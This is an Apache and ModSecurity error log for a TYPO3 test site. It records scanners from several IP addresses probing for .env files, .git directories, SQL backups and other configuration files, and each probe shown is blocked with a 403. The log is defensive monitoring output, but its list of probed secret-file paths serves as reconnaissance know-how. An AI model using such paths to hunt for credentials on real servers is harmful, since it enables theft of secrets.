[Fri Mar 28 05:25:38.908580 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Z-Ykwu6JzOzvChkXJd9jMwAAAAE"]
[Fri Mar 28 05:25:38.999339 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Fri Mar 28 05:25:39.034612 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Fri Mar 28 05:25:39.069629 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.wp-config.php.swp
[Fri Mar 28 05:25:39.156848 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Fri Mar 28 05:25:39.295171 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php~
[Fri Mar 28 05:25:39.382113 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-Ykw-6JzOzvChkXJd9jPgAAAAE"]
[Fri Mar 28 05:25:39.382440 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-Ykw-6JzOzvChkXJd9jPgAAAAE"]
[Fri Mar 28 05:25:39.382617 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Z-Ykw-6JzOzvChkXJd9jPgAAAAE"]
[Fri Mar 28 05:25:39.417854 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/yarn.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /yarn.lock found within REQUEST_FILENAME: /yarn.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-Ykw-6JzOzvChkXJd9jPwAAAAE"]
[Fri Mar 28 05:25:39.418080 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-Ykw-6JzOzvChkXJd9jPwAAAAE"]
[Fri Mar 28 05:25:39.418300 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "Z-Ykw-6JzOzvChkXJd9jPwAAAAE"]
[Fri Mar 28 05:25:39.840489 2025] [:error] [pid 2084703] [client 170.39.218.72:61530] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-YkwzPyhm74wMcOY7cQvAAAAAY"]
[Fri Mar 28 05:25:39.840726 2025] [:error] [pid 2084703] [client 170.39.218.72:61530] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-YkwzPyhm74wMcOY7cQvAAAAAY"]
[Fri Mar 28 05:25:39.840905 2025] [:error] [pid 2084703] [client 170.39.218.72:61530] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "Z-YkwzPyhm74wMcOY7cQvAAAAAY"]
[Fri Mar 28 05:25:39.868772 2025] [authz_core:error] [pid 2084703] [client 170.39.218.72:61530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:39.896795 2025] [authz_core:error] [pid 2084703] [client 170.39.218.72:61530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:39.925631 2025] [authz_core:error] [pid 2084703] [client 170.39.218.72:61530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:39.953653 2025] [authz_core:error] [pid 2084703] [client 170.39.218.72:61530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:39.981662 2025] [authz_core:error] [pid 2084703] [client 170.39.218.72:61530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 28 05:25:40.198686 2025] [authz_core:error] [pid 2084703] [client 170.39.218.72:61530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Fri Mar 28 05:25:40.226828 2025] [authz_core:error] [pid 2084703] [client 170.39.218.72:61530] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_backup.sql
[Sat Mar 29 18:30:21.687530 2025] [authz_core:error] [pid 2106814] [client 34.221.111.118:38960] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Mar 30 22:10:33.983705 2025] [:error] [pid 2125893] [client 45.148.10.172:40074] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-mlOWUvy7xCRhR0YxA9UQAAAAE"]
[Sun Mar 30 22:10:33.984005 2025] [:error] [pid 2125893] [client 45.148.10.172:40074] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-mlOWUvy7xCRhR0YxA9UQAAAAE"]
[Sun Mar 30 22:10:33.984169 2025] [:error] [pid 2125893] [client 45.148.10.172:40074] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-mlOWUvy7xCRhR0YxA9UQAAAAE"]
[Sun Mar 30 23:06:16.349355 2025] [authz_core:error] [pid 2125893] [client 45.148.10.98:40034] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Mar 30 23:21:57.314676 2025] [authz_core:error] [pid 2125918] [client 45.148.10.98:35674] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Mar 31 06:03:49.392518 2025] [authz_core:error] [pid 2148491] [client 45.148.10.98:40732] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Mar 31 06:05:59.737289 2025] [authz_core:error] [pid 2148488] [client 45.148.10.98:34532] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Mar 31 14:30:21.949896 2025] [authz_core:error] [pid 2152089] [client 45.148.10.98:41666] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Mar 31 15:14:15.180963 2025] [authz_core:error] [pid 2153666] [client 45.148.10.98:53996] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 01 18:39:46.721190 2025] [authz_core:error] [pid 2174370] [client 93.123.109.7:47308] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 01 18:39:50.046431 2025] [authz_core:error] [pid 2168799] [client 93.123.109.7:46792] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 01 21:05:57.639269 2025] [authz_core:error] [pid 2174112] [client 93.123.109.7:45876] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 01 21:14:04.219519 2025] [authz_core:error] [pid 2173271] [client 93.123.109.7:40514] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Apr 01 22:05:41.574323 2025] [:error] [pid 2174112] [client 45.148.10.172:46928] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-xHFbeOQaZH2O_bqzHx-QAAAAc"]
[Tue Apr 01 22:05:41.574591 2025] [:error] [pid 2174112] [client 45.148.10.172:46928] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-xHFbeOQaZH2O_bqzHx-QAAAAc"]
[Tue Apr 01 22:05:41.574791 2025] [:error] [pid 2174112] [client 45.148.10.172:46928] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-xHFbeOQaZH2O_bqzHx-QAAAAc"]
[Tue Apr 01 23:54:14.996530 2025] [authz_core:error] [pid 2168776] [client 93.123.109.7:50556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 00:01:37.546561 2025] [authz_core:error] [pid 2187855] [client 93.123.109.7:45596] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 02:33:25.100321 2025] [:error] [pid 2187856] [client 196.251.72.127:46404] [client 196.251.72.127] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-yF1UksyI3Mba1CoBXkrQAAAAM"]
[Wed Apr 02 02:33:25.100624 2025] [:error] [pid 2187856] [client 196.251.72.127:46404] [client 196.251.72.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-yF1UksyI3Mba1CoBXkrQAAAAM"]
[Wed Apr 02 02:33:25.100799 2025] [:error] [pid 2187856] [client 196.251.72.127:46404] [client 196.251.72.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-yF1UksyI3Mba1CoBXkrQAAAAM"]
[Wed Apr 02 02:33:26.258314 2025] [authz_core:error] [pid 2187854] [client 196.251.72.127:46422] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Apr 02 07:25:13.568660 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJQAAAAM"]
[Wed Apr 02 07:25:13.569987 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJQAAAAM"]
[Wed Apr 02 07:25:13.570170 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJQAAAAM"]
[Wed Apr 02 07:25:13.596583 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJgAAAAM"]
[Wed Apr 02 07:25:13.596809 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJgAAAAM"]
[Wed Apr 02 07:25:13.596955 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJgAAAAM"]
[Wed Apr 02 07:25:13.623349 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJwAAAAM"]
[Wed Apr 02 07:25:13.623562 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJwAAAAM"]
[Wed Apr 02 07:25:13.623708 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBJwAAAAM"]
[Wed Apr 02 07:25:13.650078 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBKAAAAAM"]
[Wed Apr 02 07:25:13.650338 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBKAAAAAM"]
[Wed Apr 02 07:25:13.650486 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBKAAAAAM"]
[Wed Apr 02 07:25:13.677228 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBKQAAAAM"]
[Wed Apr 02 07:25:13.677432 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBKQAAAAM"]
[Wed Apr 02 07:25:13.677590 2025] [:error] [pid 2190215] [client 154.83.103.15:27580] [client 154.83.103.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-zKOYXG9q9bj4Y0L9vBKQAAAAM"]
[Wed Apr 02 07:25:14.208386 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Wed Apr 02 07:25:14.234760 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Wed Apr 02 07:25:14.350429 2025] [authz_core:error] [pid 2190215] [client 154.83.103.15:27580] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.ini
